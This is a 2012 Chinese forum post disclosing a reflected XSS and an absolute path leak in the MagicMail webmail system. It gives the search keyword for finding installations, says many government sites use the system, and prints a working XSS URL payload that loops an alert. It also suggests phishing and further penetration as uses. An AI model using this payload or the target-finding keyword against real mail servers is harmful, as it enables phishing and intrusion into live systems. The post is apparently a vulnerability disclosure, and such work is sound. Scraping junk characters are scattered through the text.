今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
0 q' ~& @2 n2 P8 d
% q) Q9 D/ s/ h( v& k: Z
* O/ V5 B8 G5 P6 R7 L包含 一个反射性XSS 以及 绝对路径泄漏
! ~$ |+ x6 l7 H1 C, w8 G/ f看了看 貌似全部是linux的。, v8 z7 a& `# a7 M( \& `
2 \3 ?/ K( C5 v! t8 l关键字:迈捷邮件系统 by MagicMail
, ~( E6 S3 F+ h+ {5 P6 v8 m; F. Z( Y5 ~- d! A
可以看到很多政府网站都用这个邮件系统/ V3 L9 p7 i& G! h; E9 o1 P" o
v/ E# a9 j. W0 I A7 E
绝对路径 http://madman.in/index.php?login_type=declare&language=
' d+ `- h, ]: [3 z( S+ ~
( ^5 _1 |- q$ ]) ~* w4 T1 R5 R( c' M3 p2 C2 C, [6 `
0 M2 f3 v; _# a2 X" W2 F
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E( D5 l* E! @8 G# N, `$ g. J) D- k
3 r- s2 e; |3 K% o8 d# r
" V# ~ O# C2 ?& G
$ |0 Y. u2 G( ]2 w9 P, W' l0 y
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等+ k: w4 ]( z5 m* y- C9 H* `$ J* g
5 Q3 @) u# r* L& m( D7 O( X: X3 w4 _' L
修复方案:看官方补丁吧。! t8 z& H0 H; R7 s
|
发表于 2012-11-9 20:38:41
收藏
支持
反对